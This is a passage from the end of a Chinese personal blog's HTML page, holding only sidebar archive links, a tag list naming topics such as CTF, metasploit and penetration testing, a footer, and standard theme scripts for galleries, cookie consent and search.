tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/01/"><span class="level-start"><span class="level-item">一月 2020</span></span><span class="level-end"><span class="level-item tag">4</span></span></a></li><li><a class="level is-mobile" href="/archives/2019/11/"><span class="level-start"><span class="level-item">十一月 2019</span></span><span class="level-end"><span class="level-item tag">6</span></span></a></li><li><a class="level is-mobile" href="/archives/2019/10/"><span class="level-start"><span class="level-item">十月 2019</span></span><span class="level-end"><span class="level-item tag">7</span></span></a></li><li><a class="level is-mobile" href="/archives/2019/09/"><span class="level-start"><span class="level-item">九月 2019</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></div></div></div><div class="card widget" data-type="tags"><div class="card-content"><div class="menu"><h3 class="menu-label">标签</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/AI/"><span class="tag">AI</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/CTF/"><span class="tag">CTF</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Powershell/"><span class="tag">Powershell</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Writeup/"><span class="tag">Writeup</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/flask/"><span class="tag">flask</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/metasploit/"><span class="tag">metasploit</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/python/"><span class="tag">python</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/shell/"><span class="tag">shell</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/ssr/"><span class="tag">ssr</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tables/"><span class="tag">tables</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tricks/"><span class="tag">tricks</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/vulnhub/"><span class="tag">vulnhub</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"><span class="tag">渗透测试</span><span class="tag">3</span></a></div></div></div></div></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.svg" alt="饱食终日，无所事事" height="28"></a><p class="is-size-7"><span>&copy; 2020 lll</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p></div><div class="level-end"></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" async></script><script>moment.locale("zh-CN");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "此网站使用Cookie来改善您的体验。",
          dismiss: "知道了！",
          allow: "允许使用Cookie",
          deny: "拒绝",
          link: "了解更多",
          policy: "Cookie政策",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>